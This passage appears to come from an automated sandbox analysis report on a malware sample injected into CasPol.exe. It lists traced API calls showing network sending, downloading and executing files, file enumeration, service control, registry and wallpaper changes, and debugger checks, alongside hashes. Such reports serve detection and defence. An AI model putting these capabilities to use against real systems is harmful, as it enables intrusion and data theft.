                                                                                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                    • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4043647387-0
                                                                                                                  • Opcode ID: 2e118caea6eb98721dec0b2ae2545db872e6122bf62c10857914d379e6fc8d09
                                                                                                                  • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                  • Opcode Fuzzy Hash: 2e118caea6eb98721dec0b2ae2545db872e6122bf62c10857914d379e6fc8d09
                                                                                                                  • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 276877138-0
                                                                                                                  • Opcode ID: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                  • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                  • Opcode Fuzzy Hash: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                  • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                  • String ID: @CG$XCG$>G
                                                                                                                  • API String ID: 341183262-3030817687
                                                                                                                  • Opcode ID: 3625e89d811a110726c67b55866f0aaafde1f67b3117887488e3d907e6405d59
                                                                                                                  • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                  • Opcode Fuzzy Hash: 3625e89d811a110726c67b55866f0aaafde1f67b3117887488e3d907e6405d59
                                                                                                                  • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                                                                  • API String ID: 1589313981-1420736420
                                                                                                                  • Opcode ID: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                  • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                  • Opcode Fuzzy Hash: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                  • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
                                                                                                                  • GetACP.KERNEL32 ref: 004512CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                  • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                  • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                  APIs
                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID: SETTINGS
                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                  • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                  • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 004514D3
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 745075371-0
                                                                                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                  • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                  • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1157919129-0
                                                                                                                  • Opcode ID: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                  • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                  • Opcode Fuzzy Hash: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                  • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                  • API String ID: 2825088817-4197237851
                                                                                                                  • Opcode ID: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                  • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                  • Opcode Fuzzy Hash: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                  • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                  • String ID: x@G$x@G
                                                                                                                  • API String ID: 4113138495-3390264752
                                                                                                                  • Opcode ID: e7b18a49c8fe02a695f0156aba99b99c0110d0c894b694f766df84ba5171fd6b
                                                                                                                  • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                  • Opcode Fuzzy Hash: e7b18a49c8fe02a695f0156aba99b99c0110d0c894b694f766df84ba5171fd6b
                                                                                                                  • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                  • Opcode ID: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                  • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                  • Opcode Fuzzy Hash: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                  • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 3906539128-661517699
                                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                  • Opcode ID: a1aecca224c57a5702e428d2a279967f7ead68b4c693223dd68e6522a7beb948
                                                                                                                  • Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
                                                                                                                  • Opcode Fuzzy Hash: a1aecca224c57a5702e428d2a279967f7ead68b4c693223dd68e6522a7beb948
                                                                                                                  • Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00450B71
                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4212172061-0
                                                                                                                  • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                  • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                  • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                  • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstH_prologNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 301083792-0
                                                                                                                  • Opcode ID: 0f858e4dd5096bc83d58a7e856ecb51b4ccb7f6bae75c14cf2fecf0dacd635f5
                                                                                                                  • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                  • Opcode Fuzzy Hash: 0f858e4dd5096bc83d58a7e856ecb51b4ccb7f6bae75c14cf2fecf0dacd635f5
                                                                                                                  • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00448077
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 00448089
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
